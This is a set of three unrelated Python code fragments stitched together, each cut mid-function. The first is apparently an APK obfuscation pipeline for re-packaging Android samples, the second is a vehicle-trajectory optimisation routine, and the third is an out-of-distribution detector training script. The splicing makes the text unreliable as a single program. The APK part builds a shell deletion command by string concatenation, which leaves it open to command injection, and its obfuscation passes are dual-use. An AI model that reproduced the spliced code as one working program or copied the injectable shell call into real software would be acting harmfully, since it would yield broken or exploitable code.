apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_nop)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Nop')
def run_obfuscator_debug(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Debug')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_debug)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Debug')
def run_obfuscator_branch(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Branch')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_branch)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Branch')
def run_obfuscator_reordering(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Reordering')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_reordering)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Reordering')
def run_obfuscator_reflection(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Reflection')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_reflection)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Reflection')
def run_obfuscator_fields(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Field')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_fields)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Fields')
def run_obfuscator_manifest(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Manifest')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_manifest)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Manifest')
def run_obfuscator_resource(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Resource')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_resource)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Resource')
def run_obfuscator_raw(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Raw')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_raw)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Raw')
def run_obfuscator_restring(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Restring')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_restring)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Restring')
def run_obfuscator_asset(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Asset')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_asset)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Asset')
def run_obfuscator_intercept(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Intercept')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_intercept)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Intercept')
def run_obfuscator_lib(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Lib')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_lib)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Lib')
#The obfuscator DB Name to Method mapping
obfuscator_mapping = {
'Resigned': run_obfuscator_resigned,
'Alignment': run_obfuscator_zip,
'Rebuild': run_obfuscator_rebuild,
'Defunct': run_obfuscator_defunct,
'Renaming': run_obfuscator_renaming,
'Goto': run_obfuscator_goto,
'StringEncrypt': run_obfuscator_string,
'Indirections': run_obfuscator_indirections,
'Nop': run_obfuscator_nop,
'Debug': run_obfuscator_debug,
'ArithmeticBranch': run_obfuscator_branch,
'Reordering': run_obfuscator_reordering,
'Reflection': run_obfuscator_reflection,
'Fields': run_obfuscator_fields,
'Manifest': run_obfuscator_manifest,
'Resource': run_obfuscator_resource,
'Raw': run_obfuscator_raw,
'Restring': run_obfuscator_restring,
'Asset': run_obfuscator_asset,
'Intercept': run_obfuscator_intercept,
'Lib': run_obfuscator_lib
}
def clean_apk(sample_file_name): # Clear the temporary apk
try:
if enable_logging:
u.logger('Apk cleaned: ' + sample_file_name)
popen('rm -f ' + sample_file_name)
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to clean ' + sample_file_name)
def obfuscate_sample(sample_file_name, obfuscator_list, sample_tf_dir):
'''This function obfucate a sample with the obfuscators in the list using a temporary directory as support'''
init(sample_tf_dir)
if enable_logging:
u.logger('Obfuscate Request: %s - %s - %s' % (sample_file_name, obfuscator_list, sample_tf_dir))
else:
u.logger('Obfuscate Request')
if not debug:
clean_temp(sample_tf_dir)
backsmali(sample_tf_dir, sample_file_name)
start_time = datetime.utcnow()
if enable_logging:
u.logger('Obfuscate Start: ' + str(start_time))
try:
for obfuscator_item in obfuscator_list:
obfuscator_method = obfuscator_mapping[obfuscator_item]
obfuscator_method(sample_file_name, sample_tf_dir)
except KeyError as ex:
raise e.RunningObfuscatorException('Invalid obfuscator id ' + str(ex))
end_time = datetime.utcnow()
if enable_logging:
u.logger('Obfuscate Stop: ' + str(end_time))
u.logger('Obfuscate Time: ' + str(end_time-start_time))
if cleanup:
sample_ob_file_name = sample_file_name + 'Ob'
else:
sample_ob_file_name = sample_file_name
smali(sample_tf_dir, sample_ob_file_name)
sign_apk(sample_ob_file_name)
if not debug:
clean_temp(sample_tf_dir)
if cleanup:
clean_apk(sample_file_name)
u.logger('### SUCCESS ### {' + str(end_time-start_time) + '}')
def apply_dir(filename, obfuscator_to_apply, mode=0, retry=0):
try:
obfuscate_sample(adam_base_dir + 'input/' + filename, obfuscator_to_apply, adam_base_dir + 'temp/' + filename[:-4])
sys.exit(0)
except e.AndroidLimitException as ex:
u.logger('### ERROR ### ' + str(ex) + ' ### ERROR ###')
u.logger('### WARNING ###')
if mode == 0:
apply_dir(filename, [o for o in obfuscator_to_apply if o != 'Reflection'], 1)
elif mode == 1:
apply_dir(filename, [o for o in obfuscator_to_apply if o != 'Indirections'], 2)
else:
sys.exit(1)
except e.AndroidRandomException as ex:
u.logger('### ERROR ### ' + str(ex) + ' ### ERROR ###')
if retry == 0:
u.logger('### WARNING ###')
apply_dir(filename, obfuscator_to_apply, mode, retry + 1)
else:
u.logger('### FAILURE ###')
sys.exit(2)
except Exception as ex:
u.logger('### ERROR ### ' + str(ex) + ' ### ERROR ###')
u.logger('### FAILURE ###')
sys.exit(2)
'''obfuscator_to_apply = ['Resigned',
'Alignment',
'Rebuild',
'Fields',
'Debug',
'Indirections',
| |
x: position measurements (N x 1), could have NaN
N: int number of measurements
dt: float delta T
notNan: bool array indicating timestamps that have measurements
lam: given parameter
Return: float
"""
# unpack decision variables
xhat = X[:N]
offset1 = int((1+order-1)*(order-1)/2)
highest_order_dynamics = X[order*N-offset1:] # to be regularized
rescale = (30)**(order)
# select valid measurements
xhat = xhat[notNan]
x = x[notNan]
# min perturbation
c1 = LA.norm(x-xhat,2)**2 * rescale /np.count_nonzero(notNan)
c2 = LA.norm(highest_order_dynamics,2)**2 / len(highest_order_dynamics)
cost = lam*c1 + (1-lam) * c2
return cost
def const_1d(N, dt, order):
""" The constraint representing linear dynamics
N: number of timesteps for xhat, n=3N-3
Return: matrix A (2N-3 x 3N-3), such that A dot X = [0]_(nx1)
for scipy.optimize.LinearConstraint: lb<= A.dot(X) <= ub 'trust-constr'
"""
offset = int((1+order)*order/2)
n = (order+1)*N-offset
m = order*N-offset
A = np.zeros((m,n))
for o in range(order):
offset_pre = int((1+o)*o/2)
offset_post = int((2+o)*(o+1)/2)
start_row = o*N-offset_pre
end_row = (o+1)*N-offset_post
step = N-o
for i in range(start_row, end_row):
A[i][i+o] = -1
A[i][i+o+1] = 1
A[i][i+o+step] = -dt
return A
def loss(Yre, Y1, norm='l21'):
'''
different ways to compute the diff matrix
'''
notNan = ~np.isnan(np.sum(Y1,axis=-1))
Y1 = Y1[notNan,:]
Yre = Yre[notNan,:]
diff = np.abs(Y1-Yre)
N = len(diff)
if N==0:
return 0
if norm=='l21':
return np.nanmean(LA.norm(diff,axis=1))
elif norm=='l2':
return LA.norm(diff,'fro')/N
elif norm=='xy': # weighted xy
mae_x = np.abs(diff[:,[0,2,4,6]])
mae_y = np.abs(diff[:,[1,3,5,7]])
alpha = 0.3
mae_xy = alpha*mae_x + (1-alpha)*mae_y
return LA.norm(mae_xy,'fro')/N
def get_costs(Yre, Y1, x,y,v,a,theta, norm):
'''
for normalizing lambdas
'''
N = len(a)
c1m, c2m, c3m, c4m, c5m = 1,1,1,1,1 # directly calculate 2-norm
c1 = loss(Yre, Y1, norm)/c1m
c2 = LA.norm(a,2)/N/30/c2m
j = np.diff(a)
c3 = LA.norm(j,2)/N/30/c3m
st = sin(theta)
c4 = LA.norm(st,2)/N/c4m
o = np.diff(theta)
c5 = LA.norm(o,2)/N/c5m
return c1,c2,c3,c4,c5
def obj1(X, Y1,N,dt,notNan, lam1,lam2,lam3,lam4,lam5):
"""The cost function
X = [a,theta,v0,x0,y0,w,l]^T
penalize only theta, correction and accel
pretty accurate and faster than previous formulation
"""
nvalid = np.count_nonzero(notNan)
# unpack
v = X[:N]
theta = X[N:2*N]
x0,y0,w,l = X[2*N:]
Yre,x,y,a = generate(w,l,x0, y0, theta,v, outputall=True)
Yre = Yre[notNan,:]
# min perturbation
c1 = lam1 * loss(Yre, Y1, 'l21')
# regularize acceleration # not the real a or j, multiply a constant dt
c2 = lam2*LA.norm(a,2)/nvalid/30
# regularize jerk
j = np.diff(a)/dt
c3 = lam3*LA.norm(j,2)/nvalid /900
# regularize angle
st = sin(theta)
c4 = lam4*LA.norm(st,2)/nvalid
# regularize angular velocity
o = np.diff(theta)/dt
c5 = lam5*LA.norm(o,2)/nvalid/30
return c1+c2+c3+c4+c5
def unpack1(res,N,dt):
# extract results
# unpack variables
x = np.zeros(N)
y = np.zeros(N)
# ver2 unpack
v = res.x[:N]
theta = res.x[N:2*N]
x0,y0,w,l = res.x[2*N:]
Yre, x, y, a = generate(w,l,x0, y0, theta,v, outputall=True)
return Yre, x,y,v,a,theta,w,l
def rectify_single_camera(df, args):
'''
df: a single track in one camera view
'''
lam1, lam2, lam3,lam4,lam5,niter = args
timestamps = df.Timestamp.values
dt = np.diff(timestamps)
sign = df["direction"].iloc[0]
# get bottom 4 points coordinates
Y1 = np.array(df[pts])
N = len(Y1)
notNan = ~np.isnan(np.sum(Y1,axis=-1))
Y1 = Y1[notNan,:]
if (len(Y1) <= 3):
print('Not enough valid measurements: ', df['ID'].iloc[0])
# df.loc[:,pts] = np.nan
return None
# reorder Y1 to deal with backward traveling measurements
# new_order = np.argsort(np.sum(Y1[:, [0,2,4,6]],axis=1))[::int(sign)]
# Y1 = Y1[new_order,:]
first_valid = np.where(notNan==True)[0][0]
temp = df[~df["bbr_x"].isna()]
v_bbr = (max(temp.bbr_x.values)-min(temp.bbr_x.values))/(max(temp.Timestamp.values)-min(temp.Timestamp.values))
v_fbr = (max(temp.fbr_x.values)-min(temp.fbr_x.values))/(max(temp.Timestamp.values)-min(temp.Timestamp.values))
# avgv = max(min(v_bbr,50), min(v_fbr,50))
avgv = (v_bbr+v_fbr)/2
# print(avgv)
v0 = np.array([np.abs(avgv)]*N)
x0 = (Y1[0,0]+Y1[0,6])/2- sign*avgv*first_valid*1/30
y0 = (Y1[0,1]+Y1[0,7])/2
dy = Y1[-1,1]-Y1[0,1]
dx = Y1[-1,0]-Y1[0,0]
theta0 = np.ones((N))*np.arccos(sign) # parallel to lane
# theta0 = np.ones((N))*np.arctan2(dy,dx) # average angle
# no perfect box exists
w0 = np.nanmean(np.sqrt((Y1[:,1]-Y1[:,7])**2+(Y1[:,0]-Y1[:,6])**2))
l0 = np.nanmean(np.sqrt((Y1[:,2]-Y1[:,0])**2+(Y1[:,1]-Y1[:,3])**2))
X0 = np.concatenate((v0.T, theta0.T, \
[x0,y0,w0,l0]),axis=-1)
bnds = [(0,50) for i in range(0,N)]+\
[(np.arccos(sign),np.arccos(sign)) for i in range(N)]+\
[(-np.inf,np.inf),(0,np.inf),(1,4),(2,np.inf)]
# [(-np.pi/8+np.arccos(sign),np.pi/8+np.arccos(sign)) for i in range(N)]+\
Y0 = generate(w0,l0,x0, y0, theta0,v0)
diff = Y1-Y0[notNan,:]
c1max = np.nanmean(LA.norm(diff,axis=1))
c1max = max(c1max, 1e-4)
# SOLVE FOR MAX C2-C5 BY SETTING LAM2-5 = 0
lams = (100,0,0,0,0)
minimizer_kwargs = {"method":"L-BFGS-B", "args":(Y1,N,dt,notNan,*lams),'bounds':bnds,'options':{'disp': False}}
res = basinhopping(obj1, X0, minimizer_kwargs=minimizer_kwargs,niter=0)
print('\n')
print('Initilization: ',loss(Y0[notNan,:], Y1, norm='l2'))
# extract results
Yre, x,y,v,a,theta,w,l = unpack1(res,N,dt)
Yre = Yre[notNan,:]
_,c2max,c3max,c4max,c5max = get_costs(Yre, Y1, x,y,v,a,theta,'l21')
c2max,c3max,c4max,c5max = max(c2max, 1e-4), max(c3max, 1e-4), max(c4max, 1e-4), max(c5max, 1e-4)
# SOLVE AGAIN - WITH NORMALIZED OBJECTIVES
lams = (lam1/c1max,lam2/c2max,lam3/c3max,lam4/c4max,lam5/c5max)
minimizer_kwargs = {"method":"L-BFGS-B", "args":(Y1,N,dt,notNan,*lams),'bounds':bnds,'options':{'disp': False}}
res = basinhopping(obj1, X0, minimizer_kwargs=minimizer_kwargs,niter=niter)
Yre, x,y,v,a,theta,w,l = unpack1(res,N,dt)
print('Final: ',loss(Yre[notNan,:], Y1, norm='l2'))
df.loc[:,pts] = Yre
df.loc[:,'acceleration'] = a
df.loc[:,'speed'] = v
df.loc[:,'x'] = x
df.loc[:,'y'] = y
df.loc[:,'theta'] = theta
df.loc[:,'width'] = w
df.loc[:,'length'] = l
return df
def applyParallel(dfGrouped, func, args=None):
with Pool(cpu_count()) as p:
if args is None:
ret_list = list(tqdm(p.imap(func, [group for name, group in dfGrouped]), total=len(dfGrouped.groups)))
else:# if has extra arguments
ret_list = list(tqdm(p.imap(partial(func, args=args), [group for name, group in dfGrouped]), total=len(dfGrouped.groups)))
return pd.concat(ret_list)
def rectify(df):
'''
apply solving obj1 for each objects in the entire dataframe
'''
print('Rectifying...')
# filter out len<2
df = df.groupby("ID").filter(lambda x: len(x)>=2)
tqdm.pandas()
# lams = (1,0.2,0.2,0.05,0.02) # lambdas
lams = (1,0,0,0.1,0.1,0) # 1:data perturb 2: acceleration 3: jerk 4: theta 5: omega
df = applyParallel(df.groupby("ID"), rectify_single_camera, args = lams).reset_index(drop=True)
# df = df.groupby('ID').apply(rectify_single_camera, args=lams).reset_index(drop=True)
return df
def rectify_receding_horizon(df):
'''
apply solving obj1 for each objects in the entire dataframe
'''
# filter out len<2
df = df.groupby("ID").filter(lambda x: len(x)>=2)
tqdm.pandas()
# df = df.groupby("ID").progress_apply(receding_horizon_opt).reset_index(drop=True)
return df
def receding_horizon_opt(car):
'''
Y,timestamps,w,l,n,PH,IH
re-write the batch optimization (opt1 and op2) into mini-batch optimization to save computational time
n: number of frames, assuming 30 fps
PH: prediction horizon
IH: implementation horizon
'''
w,l = estimate_dimensions(car) # use some data to estimate vehicle dimensions
# print('estimated w:',w,'l:',l)
# optimization parameters
lam1 = 1 # modification of measurement
lam2 = 1 # acceleration
lam3 = 0 # jerk
lam4 = 50 # theta
lam5 = 1 # omega
PH = 200 # optimize over Prediction Horizon frames
IH = 100 # implementation horizon
sign = car['direction'].iloc[0]
timestamps = car.Timestamp.values
pts = ['bbr_x','bbr_y', 'fbr_x','fbr_y','fbl_x','fbl_y','bbl_x', 'bbl_y']
Y = np.array(car[pts])
n = len(Y)
Yre = np.empty((0,8))
a_arr = np.empty((0,0))
x_arr = np.empty((0,0))
y_arr = np.empty((0,0))
v_arr = np.empty((0,0))
theta_arr = np.empty((0,0))
for i in range(0,n-IH,IH):
# print(i,'/',n, flush=True)
Y1 = Y[i:min(i+PH,n),:]
N = len(Y1)
notNan = ~np.isnan(np.sum(Y1,axis=-1))
# if (i>0) and (np.count_nonzero(notNan)<4): # TODO: does not work if first PH has not enough measurements!
# if not enough measurement for this PH, simply use the last round of answers
# Yre = np.vstack([Yre,Yre1[:N if i+PH>=n else PH-IH,:]])
# a_arr = np.append(a_arr,a[:N if i+PH>=n else PH-IH:])
# x_arr = np.append(x_arr,x[:N if i+PH>=n else PH-IH:])
# y_arr = np.append(y_arr,y[:N if i+PH>=n else PH-IH:])
# v_arr = np.append(v_arr,v[:N if i+PH>=n else PH-IH:])
# theta_arr = np.append(theta_arr,theta[:N if i+PH>=n else PH-IH:])
# continue
Y1 = Y1[notNan,:]
ts = timestamps[i:min(i+PH,n)]
dt = np.diff(ts)
a0 = np.zeros((N))
try:
v0 = v_arr[-1]
except:
v0 =(Y1[-1,0]-Y1[0,0])/(ts[notNan][-1]-ts[notNan][0])
try:
x0 = x_arr[-1]
y0 = y_arr[-1]
except:
x0 = (Y1[0,0]+Y1[0,6])/2
y0 = (Y1[0,1]+Y1[0,7])/2
v0 = np.abs(v0)
theta0 = np.ones((N))*np.arccos(sign)
X0 = np.concatenate((a0.T, theta0.T, \
[v0,x0,y0]),axis=-1)
if sign>0:
bnds = [(-5,5) for ii in range(0,N)]+\
[(-np.pi/8,np.pi/8) for ii in range(N)]+\
[(0,40),(-np.inf,np.inf),(0,np.inf)]
else:
bnds = [(-5,5) for ii in range(0,N)]+\
[(-np.pi/8+np.pi,np.pi/8+np.pi) for ii in range(N)]+\
[(0,40),(-np.inf,np.inf),(0,np.inf)]
res = minimize(obj2, X0, (Y1,N,dt,notNan,w,l,lam1,lam2,lam3,lam4,lam5), method = 'L-BFGS-B',
bounds=bnds, options={'disp': False,'maxiter':100000})#
# extract results
Yre1, x,y,v,a,theta,omega = unpack2(res,N,dt,w,l)
Yre = np.vstack([Yre,Yre1[:N if i+PH>=n else IH,:]])
a_arr = np.append(a_arr,a[:N if i+PH>=n else IH])
x_arr = np.append(x_arr,x[:N if i+PH>=n else IH])
y_arr = np.append(y_arr,y[:N | |
<gh_stars>10-100
import argparse
import os
import sys
import shutil
import time
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision
import numpy as np
import models.densenet as dn
import models.wideresnet as wn
import models.gmm as gmmlib
from utils import TinyImages
import utils.svhn_loader as svhn
from sklearn import mixture
# used for logging to TensorBoard
from tensorboard_logger import configure, log_value
parser = argparse.ArgumentParser(description='PyTorch DenseNet Training')
parser.add_argument('--gpu', default='0', type=str, help='which gpu to use')
parser.add_argument('--in-dataset', default="CIFAR-10", type=str, help='in-distribution dataset')
parser.add_argument('--model-arch', default='densenet', type=str, help='model architecture')
parser.add_argument('--epochs', default=100, type=int,
help='number of total epochs to run')
parser.add_argument('--save-epoch', default=10, type=int,
help='save the model every save_epoch')
parser.add_argument('--start-epoch', default=0, type=int,
help='manual epoch number (useful on restarts)')
parser.add_argument('-b', '--batch-size', default=64, type=int,
help='mini-batch size (default: 64)')
parser.add_argument('--ood-batch-size', default=50, type=int,
help='mini-batch size (default: 50)')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
help='initial learning rate')
parser.add_argument('--momentum', default=0.9, type=float, help='momentum')
parser.add_argument('--weight-decay', '--wd', default=0.0001, type=float,
help='weight decay (default: 0.0001)')
parser.add_argument('--print-freq', '-p', default=10, type=int,
help='print frequency (default: 10)')
parser.add_argument('--layers', default=100, type=int,
help='total number of layers (default: 100)')
parser.add_argument('--depth', default=40, type=int,
help='depth of resnet')
parser.add_argument('--width', default=4, type=int,
help='width of resnet')
parser.add_argument('--growth', default=12, type=int,
help='number of new channels per layer (default: 12)')
parser.add_argument('--droprate', default=0.0, type=float,
help='dropout probability (default: 0.0)')
parser.add_argument('--no-augment', dest='augment', action='store_false',
help='whether to use standard augmentation (default: True)')
parser.add_argument('--reduce', default=0.5, type=float,
help='compression rate in transition stage (default: 0.5)')
parser.add_argument('--no-bottleneck', dest='bottleneck', action='store_false',
help='To not use bottleneck block')
parser.add_argument('--resume', default='', type=str,
help='path to latest checkpoint (default: none)')
parser.add_argument('--name', required=True, type=str,
help='name of experiment')
parser.add_argument('--tensorboard',
help='Log progress to TensorBoard', action='store_true')
parser.set_defaults(bottleneck=True)
parser.set_defaults(augment=True)
args = parser.parse_args()
state = {k: v for k, v in args._get_kwargs()}
print(state)
directory = "checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name)
if not os.path.exists(directory):
os.makedirs(directory)
save_state_file = os.path.join(directory, 'args.txt')
fw = open(save_state_file, 'w')
print(state, file=fw)
fw.close()
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu
torch.manual_seed(1)
np.random.seed(1)
def main():
if args.tensorboard: configure("runs/%s"%(args.name))
if args.augment:
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
else:
transform_train = transforms.Compose([
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
kwargs = {'num_workers': 1, 'pin_memory': True}
if args.in_dataset == "CIFAR-10":
# Data loading code
normalizer = transforms.Normalize(mean=[x/255.0 for x in [125.3, 123.0, 113.9]],
std=[x/255.0 for x in [63.0, 62.1, 66.7]])
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('./datasets/cifar10', train=True, download=True,
transform=transform_train),
batch_size=args.batch_size, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('./datasets/cifar10', train=False, transform=transform_test),
batch_size=args.batch_size, shuffle=True, **kwargs)
lr_schedule=[50, 75, 90]
num_classes = 10
elif args.in_dataset == "CIFAR-100":
# Data loading code
normalizer = transforms.Normalize(mean=[x/255.0 for x in [125.3, 123.0, 113.9]],
std=[x/255.0 for x in [63.0, 62.1, 66.7]])
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR100('./datasets/cifar100', train=True, download=True,
transform=transform_train),
batch_size=args.batch_size, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(
datasets.CIFAR100('./datasets/cifar100', train=False, transform=transform_test),
batch_size=args.batch_size, shuffle=True, **kwargs)
lr_schedule=[50, 75, 90]
num_classes = 100
elif args.in_dataset == "SVHN":
# Data loading code
normalizer = None
train_loader = torch.utils.data.DataLoader(
svhn.SVHN('datasets/svhn/', split='train',
transform=transforms.ToTensor(), download=False),
batch_size=args.batch_size, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(
svhn.SVHN('datasets/svhn/', split='test',
transform=transforms.ToTensor(), download=False),
batch_size=args.batch_size, shuffle=False, **kwargs)
args.epochs = 20
args.save_epoch = 2
lr_schedule=[10, 15, 18]
num_classes = 10
out_loader = torch.utils.data.DataLoader(
TinyImages(transform=transforms.Compose(
[transforms.ToTensor(), transforms.ToPILImage(), transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(), transforms.ToTensor()])),
batch_size=args.ood_batch_size, shuffle=False, **kwargs)
# create model
if args.model_arch == 'densenet':
base_model = dn.DenseNet3(args.layers, num_classes, args.growth, reduction=args.reduce,
bottleneck=args.bottleneck, dropRate=args.droprate, normalizer=normalizer)
elif args.model_arch == 'wideresnet':
base_model = wn.WideResNet(args.depth, num_classes, widen_factor=args.width, dropRate=args.droprate, normalizer=normalizer)
else:
assert False, 'Not supported model arch: {}'.format(args.model_arch)
gen_gmm(train_loader, out_loader, data_used=50000, PCA=True, N=[100])
gmm = torch.load("checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name) + 'in_gmm.pth.tar')
gmm.alpha = nn.Parameter(gmm.alpha)
gmm.mu.requires_grad = True
gmm.logvar.requires_grad = True
gmm.alpha.requires_grad = False
gmm_out = torch.load("checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name) + 'out_gmm.pth.tar')
gmm_out.alpha = nn.Parameter(gmm.alpha)
gmm_out.mu.requires_grad = True
gmm_out.logvar.requires_grad = True
gmm_out.alpha.requires_grad = False
loglam = 0.
model = gmmlib.DoublyRobustModel(base_model, gmm, gmm_out,
loglam, dim=3072,
classes=num_classes).cuda()
model.loglam.requires_grad = False
# get the number of model parameters
print('Number of model parameters: {}'.format(
sum([p.data.nelement() for p in model.parameters()])))
model = model.cuda()
criterion = nn.CrossEntropyLoss().cuda()
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
cudnn.benchmark = True
# define loss function (criterion) and pptimizer
lr = args.lr
lr_gmm = 1e-5
param_groups = [{'params':model.mm.parameters(),'lr':lr_gmm, 'weight_decay':0.},
{'params':model.mm_out.parameters(),'lr':lr_gmm, 'weight_decay':0.},
{'params':model.base_model.parameters(),'lr':lr, 'weight_decay':args.weight_decay}]
optimizer = torch.optim.SGD(param_groups, momentum=args.momentum, nesterov=True)
for epoch in range(args.start_epoch, args.epochs):
adjust_learning_rate(optimizer, epoch, lr_schedule)
# train for one epoch
lam = model.loglam.data.exp().item()
train_CEDA_gmm_out(model, train_loader, out_loader, optimizer, epoch, lam=lam)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, epoch)
# remember best prec@1 and save checkpoint
if (epoch + 1) % args.save_epoch == 0:
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
}, epoch + 1)
def gen_gmm(train_loader, out_loader, data_used=50000, PCA=True, N=[100]):
print('Generate GMM...')
start = time.time()
dim = 3072
X = []
for x, f in train_loader:
X.append(x.view(-1,dim))
X = torch.cat(X, 0)
X = X[:data_used] #needed to keep memory of distance matrix below 800 GB
if PCA:
metric = gmmlib.PCAMetric(X, p=2, min_sv_factor=1e6)
X = ( (X@metric.comp_vecs.t()) / metric.singular_values_sqrt[None,:] )
else:
metric = gmmlib.LpMetric()
for n in N:
print(n)
gmm = gmmlib.GMM(n, dim, metric=metric)
clf = mixture.GMM(n_components=n, covariance_type='spherical', params='mc')
clf.fit(X)
mu = torch.tensor(clf.means_ ,dtype=torch.float)
logvar = torch.tensor(np.log(clf.covars_[:,0]) ,dtype=torch.float)
logvar = 0.*logvar + logvar.exp().mean().log()
alpha = torch.tensor(np.log(clf.weights_) ,dtype=torch.float)
gmm = gmmlib.GMM(n, dim, mu=mu, logvar=logvar, metric=metric)
if PCA:
gmm.mu.data = ( (gmm.mu.data * metric.singular_values_sqrt[None,:] )
@ metric.comp_vecs.t().inverse() )
directory = "checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name)
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory + 'in_gmm.pth.tar'
torch.save(gmm, filename)
X = []
for idx, (x, f) in enumerate(out_loader):
if idx>400:
break;
X.append(x.view(-1,dim))
X = torch.cat(X, 0)
if PCA:
X = ( (X@metric.comp_vecs.t()) / metric.singular_values_sqrt[None,:] )
for n in N:
print(n)
# Out GMM
gmm = gmmlib.GMM(n, dim, metric=metric)
clf = mixture.GMM(n_components=n, covariance_type='spherical', params='mc')
clf.fit(X)
mu = torch.tensor(clf.means_ ,dtype=torch.float)
logvar = torch.tensor(np.log(clf.covars_[:,0]) ,dtype=torch.float)
logvar = 0.*logvar + logvar.exp().mean().log()
alpha = torch.tensor(np.log(clf.weights_) ,dtype=torch.float)
gmm = gmmlib.GMM(n, dim, mu=mu, logvar=logvar, metric=metric)
if PCA:
gmm.mu.data = ( (gmm.mu.data * metric.singular_values_sqrt[None,:] )
@ metric.comp_vecs.t().inverse() )
directory = "checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name)
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory + 'out_gmm.pth.tar'
torch.save(gmm, filename)
print('Time: ', time.time() - start)
print('Done!')
def train_CEDA_gmm_out(model, train_loader, ood_loader, optimizer, epoch, lam=1., verbose=10):
criterion = nn.NLLLoss()
model.train()
train_loss = 0
likelihood_loss = 0
correct = 0
margin = np.log(4.)
if ood_loader is not None:
ood_loader.dataset.offset = np.random.randint(len(ood_loader.dataset))
ood_loader_iter = iter(ood_loader)
p_in = torch.tensor(1. / (1. + lam), dtype=torch.float).cuda()
p_out = torch.tensor(lam, dtype=torch.float).cuda() * p_in
log_p_in = p_in.log()
log_p_out = p_out.log()
start = time.time()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.cuda(), target.cuda()
noise = next(ood_loader_iter)[0].cuda()
optimizer.zero_grad()
full_data = torch.cat([data, noise], 0)
full_out = model(full_data)
full_out = F.log_softmax(full_out, dim=1)
output = full_out[:data.shape[0]]
output_adv = full_out[data.shape[0]:]
like_in_in = torch.logsumexp(model.mm(data.view(data.shape[0], -1)), 0 )
like_out_in = torch.logsumexp(model.mm(noise.view(noise.shape[0], -1)), 0 )
like_in_out = torch.logsumexp(model.mm_out(data.view(data.shape[0], -1)), 0 )
